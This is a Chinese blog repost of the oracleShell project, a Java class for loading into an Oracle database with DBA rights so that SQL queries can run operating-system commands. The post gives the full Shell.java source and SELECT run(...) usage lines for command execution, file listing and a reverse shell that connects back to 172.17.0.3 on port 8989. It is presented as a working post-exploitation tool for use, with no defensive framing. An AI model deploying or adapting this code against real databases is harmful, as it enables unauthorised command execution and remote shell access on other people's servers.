https://github.com/jas502n/oracleShell
oracleShell oracle 数据库命令执行
测试环境-DBA权限:
SELECT * FROM v$version Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production PL/SQL Release 11.2.0.1.0 - Production "CORE 11.2.0.1.0 Production" TNS for 32-bit Windows: Version 11.2.0.1.0 - Production NLSRTL Version 11.2.0.1.0 - Production
Function 功能
1 2 3 4 5 6 7 8 | 命令执行 select run( 'exec' , 'whoami' , 'UTF-8' ) from dual; 文件管理 select run( 'list' , '/usr' , 'UTF-8' ) from dual; 获取当前路径 select run( 'getCurrentDir' , '' , 'UTF-8' ) from dual; 反弹shell select run( 'connectBack' , '172.17.0.3^8989' , 'UTF-8' ) from dual; |
Shell.java
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 | import java.io.BufferedReader; import java.io.BufferedWriter; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.io.OutputStreamWriter; import java.net.Socket; import java.util.Date; public class Shell extends Object { public static String run(String methodName, String params, String encoding) { String result = "" ; if (methodName.equalsIgnoreCase( "exec" )) { result = Shell.exec(params, encoding); } else if (methodName.equalsIgnoreCase( "list" )) { result = Shell.list(params, encoding); } else if (methodName.equalsIgnoreCase( "getCurrentDir" )) { result = Shell.getCurrentDir(); } else if (methodName.equalsIgnoreCase( "connectBack" )) { String ip = params.substring( 0 , params.indexOf( "^" )); String port = params.substring(params.indexOf( "^" ) + 1 ); result = Shell.connectBack(ip, Integer.parseInt(port)); } else { result = "unkown methodName" ; } return result; } public static String exec(String cmd, String encoding) { String result = "" ; if (encoding == null || encoding.equals( "" )) { encoding = "utf-8" ; } Process p; try { p = Runtime.getRuntime().exec(cmd); try { p.waitFor(); } catch (InterruptedException e) { result += e.getMessage(); e.printStackTrace(); } InputStream fis; if (p.exitValue() == 0 ) fis = p.getInputStream(); else fis = p.getErrorStream(); InputStreamReader isr = new InputStreamReader(fis); BufferedReader br = new BufferedReader(isr); String line = null ; while ((line = br.readLine()) != null ) { result += line + "\n" ; } } catch (IOException e) { result += e.getMessage(); } return result; } public static String list(String path, String encoding) { String result = "" ; if (encoding == null || encoding.equals( "" )) { encoding = "utf-8" ; } File file = new File(path); File[] items = file.listFiles(); for ( int i = 0 ; i < items.length; i++) { File item = items[i]; String type = item.isDirectory() ? "<DIR>" : " " ; String size = item.isDirectory() ? " " : item.length() / 1024 + "KB" ; if (size.equals( "0KB" )) size = item.length() + "Byte" ; String date = new Date(item.lastModified()).toLocaleString(); result += date + " " + type + " " + size + " " + item.getName() + "\n" ; } return result; } public static String getCurrentDir() { String result = "" ; File directory = new File( "" ); try { result = directory.getAbsolutePath(); } catch (Exception e) { } return result; } public static String connectBack(String ip, int port) { class StreamConnector extends Thread { InputStream sp; OutputStream gh; StreamConnector(InputStream sp, OutputStream gh) { this .sp = sp; this .gh = gh; } public void run() { BufferedReader xp = null ; BufferedWriter ydg = null ; try { xp = new BufferedReader( new InputStreamReader( this .sp)); ydg = new BufferedWriter( new OutputStreamWriter( this .gh)); char buffer[] = new char [ 8192 ]; int length; while ((length = xp.read(buffer, 0 , buffer.length)) > 0 ) { ydg.write(buffer, 0 , length); ydg.flush(); } } catch (Exception e) { } try { if (xp != null ) xp.close(); if (ydg != null ) ydg.close(); } catch (Exception e) { } } } try { String ShellPath; if (System.getProperty( "os.name" ).toLowerCase().indexOf( "windows" ) == - 1 ) { ShellPath = new String( "/bin/sh" ); } else { ShellPath = new String( "cmd.exe" ); } Socket socket = new Socket(ip, port); Process process = Runtime.getRuntime().exec(ShellPath); ( new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); ( new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); } catch (Exception e) { } return "^OK^" ; } } |
参考链接:
rebeyond-oracleShell.jar
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· 2 本地部署DeepSeek模型构建本地知识库+联网搜索详细步骤